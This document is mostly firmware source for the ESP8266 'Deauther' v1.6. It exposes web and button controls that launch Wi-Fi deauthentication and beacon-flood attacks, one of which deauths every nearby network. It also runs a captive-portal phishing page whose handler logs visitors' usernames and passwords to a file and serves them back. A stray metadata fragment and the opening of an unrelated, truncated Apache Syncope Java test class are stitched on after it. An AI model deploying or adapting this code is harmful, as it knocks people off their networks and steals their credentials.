Attack attack;
Settings settings;
SSIDList ssidList;
void sniffer(uint8_t *buf, uint16_t len) {
clientScan.packetSniffer(buf, len);
}
#ifdef USE_DISPLAY
void drawInterface() {
if(displayOn){
display.clear();
int _lrow = 0;
for (int i = curSite * rowsPerSite - rowsPerSite; i < curSite * rowsPerSite; i++) {
if (i == 0) display.drawString(3, i * fontSize, "-> WiFi " + wifiMode);
else if (i == 1) display.drawString(3, i * fontSize, "-> " + scanMode);
else if (i == 2) display.drawString(3, i * fontSize, "-> " + attackMode_deauth + " deauth");
else if (i == 3) display.drawString(3, i * fontSize, "-> " + attackMode_beacon + " beacon flood");
else if (i - 4 < apScan.results) {
display.drawString(4, _lrow * fontSize, apScan.getAPName(i - 4));
if (apScan.isSelected(i - 4)) {
display.drawVerticalLine(1, _lrow * fontSize, fontSize);
display.drawVerticalLine(2, _lrow * fontSize, fontSize);
}
}
if (_lrow == lrow) display.drawVerticalLine(0, _lrow * fontSize, fontSize);
_lrow++;
}
display.display();
}
}
#endif
void startWifi() {
Serial.println("\nStarting WiFi AP:");
WiFi.mode(WIFI_AP_STA);
wifi_set_promiscuous_rx_cb(sniffer);
#ifdef USE_CAPTIVE_PORTAL
WiFi.softAPConfig(apIP, apIP, IPAddress(255, 255, 255, 0));
#endif
WiFi.softAP((const char*)settings.ssid.c_str(), (const char*)settings.password.c_str(), settings.apChannel, settings.ssidHidden); //for an open network without a password change to: WiFi.softAP(ssid);
if (settings.wifiClient && settings.ssidClient) {
Serial.print("Connecting to WiFi network '"+settings.ssidClient+"' using the password '"+settings.passwordClient+"' ");
if (settings.hostname) WiFi.hostname(settings.hostname);
WiFi.begin((const char*)settings.ssidClient.c_str(), (const char*)settings.passwordClient.c_str());
int conAtt = 0;
while (WiFi.status() != WL_CONNECTED) {
delay(500);
Serial.print(".");
conAtt++;
if (conAtt > 30) {
Serial.println("");
Serial.println("Failed to connect to '"+settings.ssidClient+"', skipping connection\n");
goto startWifi;
}
}
Serial.println(" connected!");
Serial.print("IP address: ");
Serial.println(WiFi.localIP());
Serial.print("Netmask: ");
Serial.println(WiFi.subnetMask());
Serial.print("Gateway: ");
Serial.println(WiFi.gatewayIP());
Serial.println("");
}
startWifi:
Serial.println("SSID : '" + settings.ssid+"'");
Serial.println("Password : '" + settings.password+"'");
#ifdef USE_CAPTIVE_PORTAL
if (settings.newUser == 0) {
dnsServer.start(DNS_PORT, "*", apIP);
Serial.println("Captive Portal: Running");
} else {Serial.println("Captive Portal: Stopped");}
#endif
if (settings.newUser == 1) {Serial.println("Redirecting to setup page");}
Serial.println("-----------------------------------------------");
if (settings.password.length() < 8) Serial.println("WARNING: password must have at least 8 characters!");
if (settings.ssid.length() < 1 || settings.ssid.length() > 32) Serial.println("WARNING: SSID length must be between 1 and 32 characters!");
wifiMode = "ON";
}
void stopWifi() {
Serial.println("stopping WiFi AP");
Serial.println("-----------------------------------------------");
WiFi.disconnect();
wifi_set_opmode(STATION_MODE);
wifiMode = "OFF";
}
void loadSetupHTML() {
server.sendHeader("Cache-Control", "no-cache, no-store, must-revalidate");
server.sendHeader("Pragma", "no-cache");
server.sendHeader("Expires", "0");
sendFile(200, "text/html", data_setup_HTML, sizeof(data_setup_HTML), true);
}
void loadIndexHTML() {
sendFile(200, "text/html", data_index_HTML, sizeof(data_index_HTML), false);
}
void loadUsersHTML() {
sendFile(200, "text/html", data_users_HTML, sizeof(data_users_HTML), false);
}
void loadAttackHTML() {
attack.ssidChange = true;
sendFile(200, "text/html", data_attack_HTML, sizeof(data_attack_HTML), false);
}
void loadDetectorHTML() {
sendFile(200, "text/html", data_detector_HTML, sizeof(data_detector_HTML), false);
}
void loadControlHTML() {
sendFile(200, "text/html", data_control_HTML, sizeof(data_control_HTML), false);
}
void loadSettingsHTML() {
sendFile(200, "text/html", data_settings_HTML, sizeof(data_settings_HTML), false);
}
void load404() {
sendFile(404, "text/html", data_404_HTML, sizeof(data_404_HTML), false);
}
void loadInfoHTML(){
sendFile(200, "text/html", data_info_HTML, sizeof(data_info_HTML), false);
}
void loadScanJS() {
sendFile(200, "text/javascript", data_scan_JS, sizeof(data_scan_JS), false);
}
void loadUsersJS() {
sendFile(200, "text/javascript", data_users_JS, sizeof(data_users_JS), false);
}
void loadAttackJS() {
attack.ssidChange = true;
sendFile(200, "text/javascript", data_attack_JS, sizeof(data_attack_JS), false);
}
void loadDetectorJS() {
sendFile(200, "text/javascript", data_detector_JS, sizeof(data_detector_JS), false);
}
void loadControlJS() {
sendFile(200, "text/javascript", data_control_JS, sizeof(data_control_JS), false);
}
void loadSettingsJS() {
sendFile(200, "text/javascript", data_settings_JS, sizeof(data_settings_JS), false);
}
void loadInfoJS() {
sendFile(200, "text/javascript", data_info_JS, sizeof(data_info_JS), false);
}
void loadFunctionsJS() {
sendFile(200, "text/javascript", data_functions_JS, sizeof(data_functions_JS), false);
}
void loadStyle() {
sendFile(200, "text/css;charset=UTF-8", data_main_CSS, sizeof(data_main_CSS), false);
}
void loadDarkMode() {
if (settings.darkMode) {
sendFile(200, "text/css;charset=UTF-8", data_dark_CSS, sizeof(data_dark_CSS), true);
} else {
server.send(200, "text/css", "/* Dark mode disabled */");
}
}
void loadDarkModeForce() {
sendFile(200, "text/css;charset=UTF-8", data_dark_CSS, sizeof(data_dark_CSS), true);
}
void loadRedirectHTML() {
server.send(302, "text/html", "<meta content='0; url=http://192.168.4.1'http-equiv='refresh'>");
}
#ifdef USE_CAPTIVE_PORTAL
void loadCaptiveHTML(){
server.sendHeader("Cache-Control", "no-cache, no-store, must-revalidate");
server.sendHeader("Pragma", "no-cache");
server.sendHeader("Expires", "0");
server.sendHeader("Content-Encoding", "identity");
server.sendContent_P((char*)data_CaptiveHTML,sizeof(data_CaptiveHTML));
sendBuffer();
};
void saveCaptiveData(String user, String passwd){
File file = SPIFFS.open("/wipwn.log", "a");
if (!file) { Serial.println("File open failed"); }
file.println("[" + settings.ssid + "] " + user + ":" + passwd + "<br>");
};
void readCaptiveData(){
String line;
File file = SPIFFS.open("/wipwn.log", "r");
if (!file) { Serial.println("file open failed"); }
Serial.println("====== Reading from SPIFFS file =======");
while(file.available()) { line += file.readStringUntil('\n'); }
Serial.println(line);
server.send(200, "text/html", line);
}
#endif
void startWiFi(bool start) {
if (start) startWifi();
else stopWifi();
clientScan.clearList();
}
//==========AP-Scan==========
void startAPScan() {
scanMode = "scanning...";
#ifdef USE_DISPLAY
drawInterface();
#endif
if (apScan.start()) {
#ifdef USE_DISPLAY
apScan.sort();
rows = 4;
rows += apScan.results;
sites = rows / rowsPerSite;
if (rows % rowsPerSite > 0) sites++;
#endif
server.send ( 200, "text/json", "true");
attack.stopAll();
scanMode = "SCAN";
}
}
void sendAPResults() {
apScan.sendResults();
}
void selectAP() {
if (server.hasArg("num")) {
apScan.select(server.arg("num").toInt());
server.send( 200, "text/json", "true");
// Remove below in a future update
attack.stopAll();
}
}
//==========Client-Scan==========
void startClientScan() {
if (server.hasArg("time") && apScan.getFirstTarget() > -1 && !clientScan.sniffing) {
server.send(200, "text/json", "true");
clientScan.start(server.arg("time").toInt());
attack.stopAll();
} else server.send( 200, "text/json", "ERROR: No selected Wi-Fi networks!");
}
void sendClientResults() {
clientScan.send();
}
void sendClientScanTime() {
server.send( 200, "text/json", (String)settings.clientScanTime );
}
void selectClient() {
if (server.hasArg("num")) {
clientScan.select(server.arg("num").toInt());
attack.stop(0);
server.send( 200, "text/json", "true");
}
}
void addClientFromList(){
if(server.hasArg("num")) {
int _num = server.arg("num").toInt();
clientScan.add(nameList.getMac(_num));
server.send( 200, "text/json", "true");
}else server.send( 200, "text/json", "false");
}
void setClientName() {
if (server.hasArg("id") && server.hasArg("name")) {
if(server.arg("name").length()>0){
nameList.add(clientScan.getClientMac(server.arg("id").toInt()), server.arg("name"));
server.send( 200, "text/json", "true");
}
else server.send( 200, "text/json", "false");
}
}
void deleteName() {
if (server.hasArg("num")) {
int _num = server.arg("num").toInt();
nameList.remove(_num);
server.send( 200, "text/json", "true");
}else server.send( 200, "text/json", "false");
}
void clearNameList() {
nameList.clear();
server.send( 200, "text/json", "true" );
}
void editClientName() {
if (server.hasArg("id") && server.hasArg("name")) {
nameList.edit(server.arg("id").toInt(), server.arg("name"));
server.send( 200, "text/json", "true");
}else server.send( 200, "text/json", "false");
}
void addClient(){
if(server.hasArg("mac") && server.hasArg("name")){
String macStr = server.arg("mac");
macStr.replace(":","");
Serial.println("add "+macStr+" - "+server.arg("name"));
if(macStr.length() < 12 || macStr.length() > 12) server.send( 200, "text/json", "false");
else{
Mac _newClient;
for(int i=0;i<6;i++){
const char* val = macStr.substring(i*2,i*2+2).c_str();
uint8_t valByte = strtoul(val, NULL, 16);
Serial.print(valByte,HEX);
Serial.print(":");
_newClient.setAt(valByte,i);
}
Serial.println();
nameList.add(_newClient,server.arg("name"));
server.send( 200, "text/json", "true");
}
}
}
//==========Attack==========
void sendAttackInfo() {
attack.sendResults();
}
void startAttack() {
if (server.hasArg("num")) {
int _attackNum = server.arg("num").toInt();
if (apScan.getFirstTarget() > -1 || _attackNum == 1 || _attackNum == 2) {
attack.start(server.arg("num").toInt());
server.send ( 200, "text/json", "true");
} else server.send( 200, "text/json", "false");
}
}
void addSSID() {
if(server.hasArg("ssid") && server.hasArg("num") && server.hasArg("enc")){
int num = server.arg("num").toInt();
if(num > 0){
ssidList.addClone(server.arg("ssid"),num, server.arg("enc") == "true");
}else{
ssidList.add(server.arg("ssid"), server.arg("enc") == "true" || server.arg("enc") == "1");
}
attack.ssidChange = true;
server.send( 200, "text/json", "true");
} else server.send( 200, "text/json", "false");
}
void cloneSelected(){
if(apScan.selectedSum > 0){
int clonesPerSSID = 48/apScan.selectedSum;
ssidList.clear();
for(int i=0;i<apScan.results;i++){
if(apScan.isSelected(i)){
ssidList.addClone(apScan.getAPName(i),clonesPerSSID, apScan.getAPEncryption(i) != "none");
}
}
}
attack.ssidChange = true;
server.send( 200, "text/json", "true");
}
void deleteSSID() {
ssidList.remove(server.arg("num").toInt());
attack.ssidChange = true;
server.send( 200, "text/json", "true");
}
void randomSSID() {
ssidList._random();
attack.ssidChange = true;
server.send( 200, "text/json", "true");
}
void clearSSID() {
ssidList.clear();
attack.ssidChange = true;
server.send( 200, "text/json", "true");
}
void resetSSID() {
ssidList.load();
attack.ssidChange = true;
server.send( 200, "text/json", "true");
}
void reloadSSID() {
attack.ssidChange = true;
server.send( 200, "text/json", "true");
}
void saveSSID() {
ssidList.save();
server.send( 200, "text/json", "true");
}
void restartESP() {
server.send( 200, "text/json", "true");
ESP.restart();
}
void enableRandom() {
server.send( 200, "text/json", "true");
attack.changeRandom(server.arg("interval").toInt());
}
void startDetector() {
Serial.println("Starting Deauth Detector in 1 second...");
server.send( 200, "text/json", "true");
delay(1000); //TODO: Fix this
wifi_set_opmode(STATION_MODE);
wifi_promiscuous_enable(0);
WiFi.disconnect();
wifi_set_promiscuous_rx_cb(dSniffer);
wifi_set_channel(curChannel);
wifi_promiscuous_enable(1);
pinMode(settings.alertPin, OUTPUT);
detecting = true;
}
void dSniffer(uint8_t *buf, uint16_t len) {
if(buf[12] == 0xA0 || buf[12] == 0xC0){
dC++;
}
}
//==========Settings==========
void getSettings() {
settings.send();
}
void getSysInfo() {
settings.sendSysInfo();
}
void saveSettings() {
server.send( 200, "text/json", "true" );
if (server.hasArg("ssid")) settings.ssid = server.arg("ssid");
if (server.hasArg("ssidHidden")) {
if (server.arg("ssidHidden") == "false") settings.ssidHidden = false;
else settings.ssidHidden = true;
}
if (server.hasArg("password")) settings.password = server.arg("password");
if (server.hasArg("apChannel")) {
if (server.arg("apChannel").toInt() >= 1 && server.arg("apChannel").toInt() <= 14) {
settings.apChannel = server.arg("apChannel").toInt();
}
}
if (server.hasArg("wifiClient")) {
if (server.arg("wifiClient") == "false") settings.wifiClient = false;
else settings.wifiClient = true;
}
if (server.hasArg("ssidClient")) settings.ssidClient = server.arg("ssidClient");
if (server.hasArg("passwordClient")) settings.passwordClient = server.arg("passwordClient");
if (server.hasArg("hostname")) settings.hostname = server.arg("hostname");
if (server.hasArg("macAp")) {
String macStr = server.arg("macAp");
macStr.replace(":","");
Mac tempMac;
if(macStr.length() == 12){
for(int i=0;i<6;i++){
const char* val = macStr.substring(i*2,i*2+2).c_str();
uint8_t valByte = strtoul(val, NULL, 16);
tempMac.setAt(valByte,i);
}
if(tempMac.valid()) settings.macAP.set(tempMac);
} else if(macStr.length() == 0){
settings.macAP.set(settings.defaultMacAP);
}
}
if (server.hasArg("randMacAp")) {
if (server.arg("randMacAp") == "false") settings.isMacAPRand = false;
else settings.isMacAPRand = true;
}
if (server.hasArg("macAp")) {
String macStr = server.arg("macAp");
macStr.replace(":","");
Mac tempMac;
if(macStr.length() == 12){
for(int i=0;i<6;i++){
const char* val = macStr.substring(i*2,i*2+2).c_str();
uint8_t valByte = strtoul(val, NULL, 16);
tempMac.setAt(valByte,i);
}
if(tempMac.valid()) settings.macAP.set(tempMac);
} else if(macStr.length() == 0){
settings.macAP.set(settings.defaultMacAP);
}
}
if (server.hasArg("randMacAp")) {
if (server.arg("randMacAp") == "false") settings.isMacAPRand = false;
else settings.isMacAPRand = true;
}
if (server.hasArg("scanTime")) settings.clientScanTime = server.arg("scanTime").toInt();
if (server.hasArg("timeout")) settings.attackTimeout = server.arg("timeout").toInt();
if (server.hasArg("deauthReason")) settings.deauthReason = server.arg("deauthReason").toInt();
if (server.hasArg("packetRate")) settings.attackPacketRate = server.arg("packetRate").toInt();
if (server.hasArg("apScanHidden")) {
if (server.arg("apScanHidden") == "false") settings.apScanHidden = false;
else settings.apScanHidden = true;
}
if (server.hasArg("beaconInterval")) {
if (server.arg("beaconInterval") == "false") settings.beaconInterval = false;
else settings.beaconInterval = true;
}
if (server.hasArg("useLed")) {
if (server.arg("useLed") == "false") settings.useLed = false;
else settings.useLed = true;
attack.refreshLed();
}
if (server.hasArg("channelHop")) {
if (server.arg("channelHop") == "false") settings.channelHop = false;
else settings.channelHop = true;
}
if (server.hasArg("multiAPs")) {
if (server.arg("multiAPs") == "false") settings.multiAPs = false;
else settings.multiAPs = true;
}
if (server.hasArg("multiAttacks")) {
if (server.arg("multiAttacks") == "false") settings.multiAttacks = false;
else settings.multiAttacks = true;
}
if (server.hasArg("ledPin")) settings.setLedPin(server.arg("ledPin").toInt());
if(server.hasArg("macInterval")) settings.macInterval = server.arg("macInterval").toInt();
if (server.hasArg("darkMode")) {
if (server.arg("darkMode") == "false") {
settings.darkMode = false;
} else {
settings.darkMode = true;
}
}
if (server.hasArg("cache")) {
if (server.arg("cache") == "false") settings.cache = false;
else settings.cache = true;
}
if (server.hasArg("serverCache")) settings.serverCache = server.arg("serverCache").toInt();
if (server.hasArg("newUser")) {
if (server.arg("newUser") == "false") settings.newUser = false;
else settings.newUser = true;
}
if (server.hasArg("detectorChannel")) settings.detectorChannel = server.arg("detectorChannel").toInt();
if (server.hasArg("detectorAllChannels")) {
if (server.arg("detectorAllChannels") == "false") settings.detectorAllChannels = false;
else settings.detectorAllChannels = true;
}
if (server.hasArg("alertPin")) settings.alertPin = server.arg("alertPin").toInt();
if (server.hasArg("invertAlertPin")) {
if (server.arg("invertAlertPin") == "false") settings.invertAlertPin = false;
else settings.invertAlertPin = true;
}
if (server.hasArg("detectorScanTime")) settings.detectorScanTime = server.arg("detectorScanTime").toInt();
if (server.hasArg("pinNames")) settings.pinNames = server.arg("pinNames");
if (server.hasArg("pins")) settings.pins = server.arg("pins");
settings.save();
}
void resetSettings() {
settings.reset();
server.send( 200, "text/json", "true" );
}
void setup() {
randomSeed(os_random());
#ifdef USE_LED16
pinMode(16, OUTPUT);
digitalWrite(16, LOW);
#endif
Serial.begin(115200);
attackMode_deauth = "START";
attackMode_beacon = "START";
EEPROM.begin(4096);
SPIFFS.begin();
settings.load();
if (debug) settings.info();
settings.syncMacInterface();
nameList.load();
ssidList.load();
attack.refreshLed();
delay(500); // Prevent bssid leak
startWifi();
attack.stopAll();
attack.generate();
/* ========== Web Server ========== */
if (settings.newUser == 1) {
/* Load certain files (only if newUser) */
server.onNotFound(loadRedirectHTML);
server.on("/js/functions.js", loadFunctionsJS);
server.on("/main.css", loadStyle);
server.on("/", loadSetupHTML);
server.on("/index.html", loadSetupHTML);
server.on("/dark.css", loadDarkModeForce);
server.on("/ClientScanTime.json", sendClientScanTime);
server.on("/settingsSave.json", saveSettings);
server.on("/restartESP.json", restartESP);
server.on("/settingsReset.json", resetSettings);
} else {
/* Redirects */
#ifndef USE_CAPTIVE_PORTAL
server.on("/index.html", loadIndexHTML);
#endif
server.on("/users.html", loadUsersHTML);
server.on("/attack.html", loadAttackHTML);
server.on("/detector.html", loadDetectorHTML);
server.on("/control.html", loadControlHTML);
server.on("/settings.html", loadSettingsHTML);
server.on("/info.html", loadInfoHTML);
/* HTML */
#ifndef USE_CAPTIVE_PORTAL
server.onNotFound(load404);
server.on("/", loadIndexHTML);
#endif
server.on("/users", loadUsersHTML);
server.on("/attack", loadAttackHTML);
server.on("/detector", loadDetectorHTML);
server.on("/control", loadControlHTML);
server.on("/settings", loadSettingsHTML);
server.on("/info", loadInfoHTML);
/* JS */
server.on("/js/scan.js", loadScanJS);
server.on("/js/users.js", loadUsersJS);
server.on("/js/attack.js", loadAttackJS);
server.on("/js/detector.js", loadDetectorJS);
server.on("/js/control.js", loadControlJS);
server.on("/js/settings.js", loadSettingsJS);
server.on("/js/info.js", loadInfoJS);
server.on("/js/functions.js", loadFunctionsJS);
/* CSS */
server.on ("/main.css", loadStyle);
server.on ("/dark.css", loadDarkMode);
/* JSON */
server.on("/APScanResults.json", sendAPResults);
server.on("/APScan.json", startAPScan);
server.on("/APSelect.json", selectAP);
server.on("/ClientScan.json", startClientScan);
server.on("/ClientScanResults.json", sendClientResults);
server.on("/ClientScanTime.json", sendClientScanTime);
server.on("/clientSelect.json", selectClient);
server.on("/setName.json", setClientName);
server.on("/addClientFromList.json", addClientFromList);
server.on("/attackInfo.json", sendAttackInfo);
server.on("/attackStart.json", startAttack);
server.on("/settings.json", getSettings);
server.on("/sysinfo.json", getSysInfo);
server.on("/settingsSave.json", saveSettings);
server.on("/settingsReset.json", resetSettings);
server.on("/deleteName.json", deleteName);
server.on("/clearNameList.json", clearNameList);
server.on("/editNameList.json", editClientName);
server.on("/addSSID.json", addSSID);
server.on("/cloneSelected.json", cloneSelected);
server.on("/deleteSSID.json", deleteSSID);
server.on("/randomSSID.json", randomSSID);
server.on("/clearSSID.json", clearSSID);
server.on("/resetSSID.json", resetSSID);
server.on("/reloadSSID.json", reloadSSID);
server.on("/saveSSID.json", saveSSID);
server.on("/restartESP.json", restartESP);
server.on("/addClient.json", addClient);
server.on("/enableRandom.json", enableRandom);
server.on("/detectorStart.json", startDetector);
}
#ifdef USE_CAPTIVE_PORTAL
server.on("/wipwn.log", readCaptiveData);
server.on("/authenticate", []() {
String user = "";
String passwd = "";
if (server.hasArg("user")) {user = server.arg("user");}
if (server.hasArg("passwd")) {passwd = server.arg("passwd");}
if (user.length() > 0 || passwd.length() > 0) {
saveCaptiveData(user, passwd);
server.send(200, "text/html", "Trying wireless authentication for IEEE 802.11 Wi-Fi connection...");
}
else loadRedirectHTML;
});
if (settings.newUser == 0) {
server.on("/wipwn", loadIndexHTML);
server.onNotFound(loadCaptiveHTML);
server.on("/", loadCaptiveHTML);
server.on("/index.html", loadCaptiveHTML);
server.on("/search", loadCaptiveHTML); //Google search captive portal. Maybe not needed. Might be handled by notFound handler.
server.on("/fwlink", loadCaptiveHTML); //Microsoft captive portal. Maybe not needed. Might be handled by notFound handler.
server.on("/success", loadCaptiveHTML); //Firefox captive portal. Maybe not needed. Might be handled by notFound handler.
server.on("/success.txt", loadCaptiveHTML); //Firefox captive portal. Maybe not needed. Might be handled by notFound handler.
server.on("/redirect", loadCaptiveHTML); //Microsoft captive portal. Maybe not needed. Might be handled by notFound handler.
EEPROM.write(multiAPsAdr, false);
settings.multiAPs = (bool)EEPROM.read(multiAPsAdr);
}
#endif
httpUpdater.setup(&server);
server.begin();
#ifdef USE_DISPLAY
display.init();
display.flipScreenVertically();
pinMode(upBtn, INPUT_PULLUP);
pinMode(downBtn, INPUT_PULLUP);
pinMode(selectBtn, INPUT_PULLUP);
if(displayBtn == 0) pinMode(displayBtn, INPUT);
else pinMode(displayBtn, INPUT_PULLUP);
display.clear();
display.setFont(ArialMT_Plain_16);
display.drawString(0, 0, "ESP8266");
display.setFont(ArialMT_Plain_24);
display.drawString(0, 16, "Deauther");
display.setFont(ArialMT_Plain_10);
display.drawString(100, 28, "v");
display.setFont(ArialMT_Plain_16);
display.drawString(104, 24, "1.6");
display.setFont(ArialMT_Plain_10);
display.drawString(0, 40, "Copyright (c) 2017");
display.drawString(0, 50, "Stefan Kremser");
display.display();
display.setFont(Roboto_Mono_8);
delay(1600);
#endif
#ifdef resetPin
pinMode(resetPin, INPUT_PULLUP);
if(digitalRead(resetPin) == LOW) settings.reset();
#endif
if(debug){
Serial.println("\nStarting...\n");
#ifndef USE_DISPLAY
delay(1600);
pinMode(0, INPUT);
#endif
}
}
void loop() {
if (detecting) {
curTime = millis();
if(curTime - prevTime >= settings.detectorScanTime){
prevTime = curTime;
Serial.println((String)dC+" - channel "+(String)curChannel);
if(dC >= 2){
if(settings.invertAlertPin) digitalWrite(settings.alertPin, LOW);
else digitalWrite(settings.alertPin, HIGH);
}else{
if(settings.invertAlertPin) digitalWrite(settings.alertPin, HIGH);
else digitalWrite(settings.alertPin, LOW);
}
dC = 0;
if(settings.detectorAllChannels){
curChannel++;
if(curChannel > 14) curChannel = 1;
wifi_set_channel(curChannel);
}
}
} else if (settings.newUser == 1) {
server.handleClient();
} else {
if (clientScan.sniffing) {
if (clientScan.stop()) startWifi();
} else {
#ifdef USE_CAPTIVE_PORTAL
dnsServer.processNextRequest();
#endif
server.handleClient();
attack.run();
}
if(Serial.available()){
String input = Serial.readString();
if(input == "reset" || input == "reset\n" || input == "reset\r" || input == "reset\r\n"){
settings.reset();
}
}
#ifndef USE_DISPLAY
#ifdef GPIO0_DEAUTH_BUTTON
// Long-press = triple LED blink + deauth all
// Short-press = LED blink + toggle deauth attack on networks selected
// If no networks are selected, then deauth all
// Make sure the device has been powered on for at least 10 seconds (prevents bootloop issue)
if(digitalRead(0) == LOW && millis() > 10000) {
Serial.println("FLASH button (GPIO0) pressed!");
if(apScan.selectedSum == 0) {
Serial.println("No networks selected... selecting & deauthing all networks");
digitalWrite(settings.ledPin, !settings.pinStateOff);
delay(50);
digitalWrite(settings.ledPin, settings.pinStateOff);
apScan.start();
apScan.select(-1);
attack.start(0);
} else {
int button_delay = 0;
while (digitalRead(0) == LOW && millis() > 4000){
button_delay++;
delay(100);
if(button_delay == 10){
Serial.println("Button held down... selecting & deauthing all networks");
digitalWrite(settings.ledPin, settings.pinStateOff);
delay(50);
digitalWrite(settings.ledPin, !settings.pinStateOff);
delay(100);
digitalWrite(settings.ledPin, settings.pinStateOff);
delay(100);
digitalWrite(settings.ledPin, !settings.pinStateOff);
delay(100);
digitalWrite(settings.ledPin, settings.pinStateOff);
delay(100);
digitalWrite(settings.ledPin, !settings.pinStateOff);
delay(100);
digitalWrite(settings.ledPin, settings.pinStateOff);
apScan.start();
apScan.select(-1);
attack.start(0);
break;
}
}
if(button_delay < 10) {
digitalWrite(settings.ledPin, !settings.pinStateOff);
delay(50);
digitalWrite(settings.ledPin, settings.pinStateOff);
Serial.println("Button quickly pressed... toggling deauth attack");
attack.start(0);
}
}
delay(400);
}
#endif
#endif
#ifdef USE_DISPLAY
if (digitalRead(upBtn) == LOW || digitalRead(downBtn) == LOW || digitalRead(selectBtn) == LOW || digitalRead(displayBtn) == LOW){
if(canBtnPress){
if(digitalRead(upBtn) == LOW) buttonPressed = 0;
else if(digitalRead(downBtn) == LOW) buttonPressed = 1;
else if(digitalRead(selectBtn) == LOW) buttonPressed = 2;
else if(digitalRead(displayBtn) == LOW) buttonPressed = 3;
canBtnPress = false;
}
}else if(!canBtnPress){
canBtnPress = true;
// ===== UP =====
if (buttonPressed == 0 && curRow > 0) {
curRow--;
if (lrow - 1 < 0) {
lrow = rowsPerSite - 1;
curSite--;
} else lrow--;
// ===== DOWN =====
} else if (buttonPressed == 1 && curRow < rows - 1) {
curRow++;
if (lrow + 1 >= rowsPerSite) {
lrow = 0;
curSite++;
} else lrow++;
// ===== SELECT =====
} else if (buttonPressed == 2) {
// ===== WIFI on/off =====
if (curRow == 0) {
if (wifiMode == "ON") stopWifi();
else startWifi();
// ===== scan for APs =====
} else if (curRow == 1) {
startAPScan();
drawInterface();
// ===== start,stop deauth attack =====
} else if (curRow == 2) {
if (attackMode_deauth == "START" && apScan.getFirstTarget() > -1) attack.start(0);
else if (attackMode_deauth == "STOP") attack.stop(0);
// ===== start,stop beacon attack =====
} else if (curRow == 3) {
if (attackMode_beacon == "START"){
//clone all selected SSIDs
if(apScan.selectedSum > 0){
int clonesPerSSID = 48/apScan.selectedSum;
ssidList.clear();
for(int i=0;i<apScan.results;i++){
if(apScan.isSelected(i)){
ssidList.addClone(apScan.getAPName(i),clonesPerSSID, apScan.getAPEncryption(i) != "none");
}
}
}
attack.ssidChange = true;
//start attack
attack.start(1);
}
else if (attackMode_beacon == "STOP") attack.stop(1);
}
// ===== select APs =====
else if (curRow >= 4) {
attack.stop(0);
apScan.select(curRow - 4);
}
}
// ===== DISPLAY =====
else if (buttonPressed == 3) {
displayOn = !displayOn;
display.clear();
display.display();
}
}
drawInterface();
#endif
}
}
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.syncope.client.console;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertNotNull;
import static org.junit.jupiter.api.Assertions.assertNull;
import static org.junit.jupiter.api.Assertions.assertTrue;
import java.io.IOException;
import java.security.AccessControlException;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.ExecutionException;
import javax.ws.rs.BadRequestException;
import org.apache.commons.lang3.StringUtils;
import org.apache.syncope.client.console.pages.Dashboard;
import org.apache.syncope.client.console.pages.Login;
import org.apache.syncope.common.lib.SyncopeClientCompositeException;
import org.apache.syncope.common.lib.SyncopeClientException;
import org.apache.syncope.common.lib.types.ClientExceptionType;
import org.apache.wicket.feedback.FeedbackMessage;
import org.apache.wicket.util.tester.FormTester;
import org.junit.jupiter.api.Test;
public class SyncopeConsoleApplicationTest extends AbstractTest {
private Map<String, String> getConfiguredSecurityHeaders() throws IOException {
Map<String, String> securityHeaders = new HashMap<>();
@SuppressWarnings("unchecked")
Enumeration<String> propNames = (Enumeration<String>) PROPS.propertyNames();
while (propNames.hasMoreElements()) {
String name = propNames.nextElement();
if (name.startsWith("security.headers.")) {
securityHeaders.put(StringUtils.substringAfter(name, "security.headers."), PROPS.getProperty(name));
}
}
return securityHeaders;
}
@Test
public void securityHeaders() throws IOException {
Map<String, String> securityHeaders = getConfiguredSecurityHeaders();
assertEquals(4, securityHeaders.size());
// 1. anonymous
TESTER.startPage(Login.class);
TESTER.assertRenderedPage(Login.class);
securityHeaders.forEach((key, value) -> assertEquals(value, TESTER.getLastResponse().getHeader(key)));
// 2. authenticated
FormTester formTester = TESTER.newFormTester("login");
formTester.setValue("username", "username");
formTester.setValue("password", "password");
formTester.submit("submit");
TESTER.assertRenderedPage(Dashboard.class);
securityHeaders.forEach((key, value) -> assertEquals(value, TESTER.getLastResponse().getHeader(key)));
}
@Test
public void errors() {
SyncopeConsoleSession session = SyncopeConsoleSession.get();
assertNull(session.getFeedbackMessages().first());
session.onException(new AccessControlException("JWT Expired"));
FeedbackMessage message = session.getFeedbackMessages().first();
assertNotNull(message);
assertTrue(message.isError());
assertEquals(SyncopeConsoleSession.Error.SESSION_EXPIRED.fallback(), message.getMessage());
session.getFeedbackMessages().clear();
session.onException(new AccessControlException("Auth Exception"));
message = session.getFeedbackMessages().first();
assertNotNull(message);
assertTrue(message.isError());
assertEquals(SyncopeConsoleSession.Error.AUTHORIZATION.fallback(), message.getMessage());
session.getFeedbackMessages().clear();
session.onException(new BadRequestException());
message = session.getFeedbackMessages().first();
assertNotNull(message);
assertTrue(message.isError());
assertEquals(SyncopeConsoleSession.Error.REST.fallback(), message.getMessage());
session.getFeedbackMessages().clear();
SyncopeClientException sce = SyncopeClientException.build(ClientExceptionType.InvalidUser);
sce.getElements().add("Error 1");
session.onException(sce);
message = session.getFeedbackMessages().first();
assertNotNull(message);
assertTrue(message.isError());
assertEquals("Error 1", message.getMessage());
session.getFeedbackMessages().clear();
sce = SyncopeClientException.build(ClientExceptionType.InvalidUser);
sce.getElements().add("Error 1");
sce.getElements().add("Error 2");
session.onException(sce);
message = session.getFeedbackMessages().first();
assertNotNull(message);
assertTrue(message.isError());
assertEquals("Error 1, Error 2", message.getMessage());
session.getFeedbackMessages().clear();
SyncopeClientCompositeException scce = SyncopeClientException.buildComposite();
scce.addException(SyncopeClientException.build(ClientExceptionType.InvalidUser));
scce.addException(SyncopeClientException.build(ClientExceptionType.InvalidExternalResource));
session.onException(new ExecutionException(scce));
message = session.getFeedbackMessages().first();
assertNotNull(message);
assertTrue(message.isError());
